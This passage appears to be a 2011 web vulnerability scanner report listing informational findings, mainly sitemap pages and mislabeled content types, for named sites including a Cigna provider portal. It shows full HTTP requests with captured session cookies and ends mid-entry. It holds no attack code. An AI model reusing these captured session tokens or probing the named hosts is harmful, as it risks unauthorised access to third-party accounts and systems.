Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=27786045.1704528150.1305557138.1305557138.1305557138.1; __utmc=27786045; __utmz=27786045.1305557138.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=b7octmjd2jmcj47lrmihtort65; __utmb=27786045

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 14:47:01 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 15656


<html>
<head>
   <title>Flyerboard Directory</title>
</head>
<body>
   <h1>Flyerboard Directory</h1>
   <br />
           <a href="http://www.paperg.com/sitemap/albany-times-union/1552.html">Albany Times Un
...[SNIP]...
21.10. http://www.paperg.com/sitemap/albany-times-union/1552.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /sitemap/albany-times-union/1552.html

Request

GET /sitemap/albany-times-union/1552.html HTTP/1.1
Host: www.paperg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=27786045.1704528150.1305557138.1305557138.1305557138.1; __utmc=27786045; __utmz=27786045.1305557138.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=b7octmjd2jmcj47lrmihtort65; __utmb=27786045

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 14:47:36 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 1202


<html>
<head>
   <title>Albany Times Union Flyer Directory</title>
</head>
<body>
   <h1>Albany Times Union Flyer Directory</h1>
   <br />
           <a href="http://www.paperg.com/flyerboard/albany-times-u
...[SNIP]...
21.11. http://www.paperg.com/sitemap/app.com/1992.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /sitemap/app.com/1992.html

Request

GET /sitemap/app.com/1992.html HTTP/1.1
Host: www.paperg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=27786045.1704528150.1305557138.1305557138.1305557138.1; __utmc=27786045; __utmz=27786045.1305557138.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=b7octmjd2jmcj47lrmihtort65; __utmb=27786045

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 14:47:38 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 235


<html>
<head>
   <title>APP.com Flyer Directory</title>
</head>
<body>
   <h1>APP.com Flyer Directory</h1>
   <br />
           <a href="http://www.paperg.com/flyerboard/app.com/1992/0.html">APP.com Flyerbo
...[SNIP]...
21.12. http://www.paperg.com/sitemap/arizona-daily-star/2955.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /sitemap/arizona-daily-star/2955.html

Request

GET /sitemap/arizona-daily-star/2955.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:19:14 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 6782
Connection: close
Via: 1.1 AN-0016020122637050


<html>
<head>
   <title>Arizona Daily Star Flyer Directory</title>
</head>
<body>
   <h1>Arizona Daily Star Flyer Directory</h1>
   <br />
           <a href="http://www.paperg.com/flyerboard/arizona-daily-
...[SNIP]...
21.13. http://www.paperg.com/sitemap/arizona-daily-sun/3027.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /sitemap/arizona-daily-sun/3027.html

Request

GET /sitemap/arizona-daily-sun/3027.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:19:13 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 845
Connection: close
Via: 1.1 AN-0016020122637050


<html>
<head>
   <title>Arizona Daily Sun Flyer Directory</title>
</head>
<body>
   <h1>Arizona Daily Sun Flyer Directory</h1>
   <br />
           <a href="http://www.paperg.com/flyerboard/arizona-daily-su
...[SNIP]...
21.14. http://www.paperg.com/sitemap/bay-area-parent---east-bay/88.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /sitemap/bay-area-parent---east-bay/88.html

Request

GET /sitemap/bay-area-parent---east-bay/88.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:19:14 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 653
Connection: close
Via: 1.1 AN-0016020122637050


<html>
<head>
   <title>Bay Area Parent - East Bay Flyer Directory</title>
</head>
<body>
   <h1>Bay Area Parent - East Bay Flyer Directory</h1>
   <br />
           <a href="http://www.paperg.com/flyerboar
...[SNIP]...
21.15. http://www.paperg.com/sitemap/bay-area-parent---san-francisco/186.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /sitemap/bay-area-parent---san-francisco/186.html

Request

GET /sitemap/bay-area-parent---san-francisco/186.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:19:13 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 676
Connection: close
Via: 1.1 AN-0016020122637050


<html>
<head>
   <title>Bay Area Parent - San Francisco Flyer Directory</title>
</head>
<body>
   <h1>Bay Area Parent - San Francisco Flyer Directory</h1>
   <br />
           <a href="http://www.paperg.com
...[SNIP]...
21.16. http://www.paperg.com/sitemap/bay-area-parent---silicon-valley/182.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /sitemap/bay-area-parent---silicon-valley/182.html

Request

GET /sitemap/bay-area-parent---silicon-valley/182.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:19:13 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 680
Connection: close
Via: 1.1 AN-0016020122637050


<html>
<head>
   <title>Bay Area Parent - Silicon Valley Flyer Directory</title>
</head>
<body>
   <h1>Bay Area Parent - Silicon Valley Flyer Directory</h1>
   <br />
           <a href="http://www.paperg.c
...[SNIP]...
21.17. http://www.paperg.com/sitemap/bay-state-banner/59.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /sitemap/bay-state-banner/59.html

Request

GET /sitemap/bay-state-banner/59.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:19:14 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 269
Connection: close
Via: 1.1 AN-0016020122637050


<html>
<head>
   <title>Bay State Banner Flyer Directory</title>
</head>
<body>
   <h1>Bay State Banner Flyer Directory</h1>
   <br />
           <a href="http://www.paperg.com/flyerboard/bay-state-banner/5
...[SNIP]...
21.18. http://www.paperg.com/sitemap/billings-gazette---billings-gazette/2701.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /sitemap/billings-gazette---billings-gazette/2701.html

Request

GET /sitemap/billings-gazette---billings-gazette/2701.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:19:15 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Connection: close
Via: 1.1 AN-0016020122637050
Content-Length: 10048


<html>
<head>
   <title>Billings Gazette - Billings Gazette Flyer Directory</title>
</head>
<body>
   <h1>Billings Gazette - Billings Gazette Flyer Directory</h1>
   <br />
           <a href="http://www.pa
...[SNIP]...
21.19. http://www.paperg.com/sitemap/billings-gazette---thrifty-nickel/3878.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /sitemap/billings-gazette---thrifty-nickel/3878.html

Request

GET /sitemap/billings-gazette---thrifty-nickel/3878.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:19:15 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 2048
Connection: close
Via: 1.1 AN-0016020122637050


<html>
<head>
   <title>Billings Gazette - Thrifty Nickel Flyer Directory</title>
</head>
<body>
   <h1>Billings Gazette - Thrifty Nickel Flyer Directory</h1>
   <br />
           <a href="http://www.paperg
...[SNIP]...
21.20. http://www.paperg.com/sitemap/birmingham-parent-magazine/2431.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /sitemap/birmingham-parent-magazine/2431.html

Request

GET /sitemap/birmingham-parent-magazine/2431.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:19:15 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 635
Connection: close
Via: 1.1 AN-0016020122637050


<html>
<head>
   <title>Birmingham Parent Magazine Flyer Directory</title>
</head>
<body>
   <h1>Birmingham Parent Magazine Flyer Directory</h1>
   <br />
           <a href="http://www.paperg.com/flyerboar
...[SNIP]...
21.21. http://www.paperg.com/sitemap/bismarck-tribune/3240.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /sitemap/bismarck-tribune/3240.html

Request

GET /sitemap/bismarck-tribune/3240.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:19:17 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1890
Connection: close
Via: 1.1 AN-0016020122637050


<html>
<head>
   <title>Bismarck Tribune Flyer Directory</title>
</head>
<body>
   <h1>Bismarck Tribune Flyer Directory</h1>
   <br />
           <a href="http://www.paperg.com/flyerboard/bismarck-tribune/3
...[SNIP]...
21.22. http://www.paperg.com/sitemap/boston-blogs/116.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /sitemap/boston-blogs/116.html

Request

GET /sitemap/boston-blogs/116.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:19:15 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 254
Connection: close
Via: 1.1 AN-0016020122637050


<html>
<head>
   <title>Boston Blogs Flyer Directory</title>
</head>
<body>
   <h1>Boston Blogs Flyer Directory</h1>
   <br />
           <a href="http://www.paperg.com/flyerboard/boston-blogs/116/0.html">B
...[SNIP]...
21.23. http://www.placelocal.com/api.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.placelocal.com
Path:   /api.php

Request

GET /api.php?request=user.forgotPassword&email=&format=json&cache=0.8891735644657254 HTTP/1.1
Host: www.placelocal.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.placelocal.com/forgot_password.php
Cookie: PHPSESSID=4d3oqoeopjg5os4f6kha7nto63; __utma=94208860.1014089333.1305558942.1305558942.1305558942.1; __utmb=94208860.1.10.1305558942; __utmc=94208860; __utmz=94208860.1305558942.1.1.utmcsr=paperg.com|utmccn=(referral)|utmcmd=referral|utmcct=/company.php

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 16 May 2011 15:41:34 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.2-1
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 15:41:34 GMT
Vary: Accept-Encoding
Content-Length: 71

[false,"Sorry, we could not find this email address in our system.",[]]
21.24. http://www.xsnet.com/Portals/64787/footerStuff.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xsnet.com
Path:   /Portals/64787/footerStuff.html

Request

GET /Portals/64787/footerStuff.html?_=1305565680528 HTTP/1.1
Host: www.xsnet.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: http://www.xsnet.com/
Cookie: .ASPXANONYMOUS=XJ4onn1KzAEkAAAAMzIwYTQ3NDctN2Q1NC00YjBjLWEzNzctMjU4NmNhMmQ0MDM20; HUBSPOT32=236000428.20480.0000; hubspotutktzo=-5

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Wed, 27 Apr 2011 23:50:34 GMT
Accept-Ranges: bytes
ETag: "0c12ce6355cc1:101a8"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 17:08:01 GMT
Content-Length: 1751

   <div class="footerInner">
       <div id="left">
           <ul>
               <li><a href="/it-maintenance-services/">IT Maintenance Services</a></li>
               <li><a href="/datacenter-relocation-services/">Datacenter Relo
...[SNIP]...
22. Content type incorrectly stated  previous  next
There are 13 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

22.1. https://cignaforhcp.cigna.com/ProviderTheme/themes/html/CignaProvider2/images/cigna/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://cignaforhcp.cigna.com
Path:   /ProviderTheme/themes/html/CignaProvider2/images/cigna/favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /ProviderTheme/themes/html/CignaProvider2/images/cigna/favicon.ico HTTP/1.1
Host: cignaforhcp.cigna.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; PD_STATEFUL_335ffd0e-289d-11e0-8e97-2054895daa77=%2Fcorp%2Fsso; JSESSIONID_CHCP=0001na8X0IINOPnLxTXec-srnIs:84FF2VLHC; PD_STATEFUL_dd717822-289d-11e0-8e97-2054895daa77=%2Fwps; JSESSIONID=0000PZ1yjRG2WKh36hwOt68f6X_:15eoj2var; PD_STATEFUL_db12e020-289d-11e0-8e97-2054895daa77=%2Fcorp%2Fsso; TLTHID=9AB6B3A47FD1107FCBDEA536181C0CE6; PD_STATEFUL_fab19a1c-356c-11e0-b99e-2054895daa77=%2Fportal

Response

HTTP/1.1 200 OK
content-language: en-US
content-length: 318
content-type: text/plain
date: Mon, 16 May 2011 15:31:58 GMT
last-modified: Mon, 20 Dec 2010 18:20:32 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
Set-Cookie: PD_STATEFUL_32910a44-289d-11e0-8e97-2054895daa77=%2FProviderTheme; Path=/

..............(.......(....... ................................................................................................................    .......................    ......    ...............    .........
...[SNIP]...
22.2. https://cignaforhcp.cigna.com/corp/sso/styles/portal_styles.css  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://cignaforhcp.cigna.com
Path:   /corp/sso/styles/portal_styles.css

Issue detail

The response contains the following Content-type statement:The response states that it contains CSS. However, it actually appears to contain HTML.

Request

GET /corp/sso/styles/portal_styles.css HTTP/1.1
Host: cignaforhcp.cigna.com
Connection: keep-alive
Referer: https://cignaforhcp.cigna.com/corp/sso/ci/selfsvc/displayId.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; TLTHID=92964B127FD1107FCAD3A536181C0CE6; JSESSIONID=0000m0b58O_Mt6JKcD_nHJ5-y0C:15eoj2vv7; PD_STATEFUL_335ffd0e-289d-11e0-8e97-2054895daa77=%2Fcorp%2Fsso; JSESSIONID_CHCP=0001na8X0IINOPnLxTXec-srnIs:84FF2VLHC; PD_STATEFUL_dd717822-289d-11e0-8e97-2054895daa77=%2Fwps

Response

HTTP/1.1 200 OK
accept-ranges: bytes
content-length: 4554
content-type: text/css
date: Mon, 16 May 2011 15:30:17 GMT
etag: "110e-11ca-8685f4c0"
last-modified: Mon, 18 Oct 2010 12:43:39 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
age: 81

<style>

   body {
   background-color : #FFFFFF;
   }
   .cignabody {
       font-family: "Arial", sans-serif;
       font-size: 11pt;
       color: #000000;
       }

   P, TD, UL, span {
   font-family: "Arial",
...[SNIP]...
22.3. https://cignaforhcp.cigna.com/wps/CacheProxyServlet/colorPalette/default/browserVendor/Netscape/browserName/Navigator/browserVersion/unknown/locale/en/forwardurl/ProviderTheme/themes/html/CignaProvider2/js.jsp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://cignaforhcp.cigna.com
Path:   /wps/CacheProxyServlet/colorPalette/default/browserVendor/Netscape/browserName/Navigator/browserVersion/unknown/locale/en/forwardurl/ProviderTheme/themes/html/CignaProvider2/js.jsp

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /wps/CacheProxyServlet/colorPalette/default/browserVendor/Netscape/browserName/Navigator/browserVersion/unknown/locale/en/forwardurl/ProviderTheme/themes/html/CignaProvider2/js.jsp HTTP/1.1
Host: cignaforhcp.cigna.com
Connection: keep-alive
Referer: https://cignaforhcp.cigna.com/wps/portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; TLTHID=92964B127FD1107FCAD3A536181C0CE6; JSESSIONID=0000m0b58O_Mt6JKcD_nHJ5-y0C:15eoj2vv7; PD_STATEFUL_335ffd0e-289d-11e0-8e97-2054895daa77=%2Fcorp%2Fsso; JSESSIONID_CHCP=0001na8X0IINOPnLxTXec-srnIs:84FF2VLHC; PD_STATEFUL_dd717822-289d-11e0-8e97-2054895daa77=%2Fwps

Response

HTTP/1.1 200 OK
content-language: en-US
content-type: application/xhtml+xml
date: Mon, 16 May 2011 15:31:37 GMT
last-modified: Mon, 20 Dec 2010 22:55:42 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
cache-control: public, max-age=432000, post-check=172000
Content-Length: 102026


var wptheme_DebugUtils = {
// summary: Collection of utilities for logging debug messages.
enabled: false,
log: function ( /*String*/className, /*String*/message ) {
...[SNIP]...
22.4. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://maps.googleapis.com
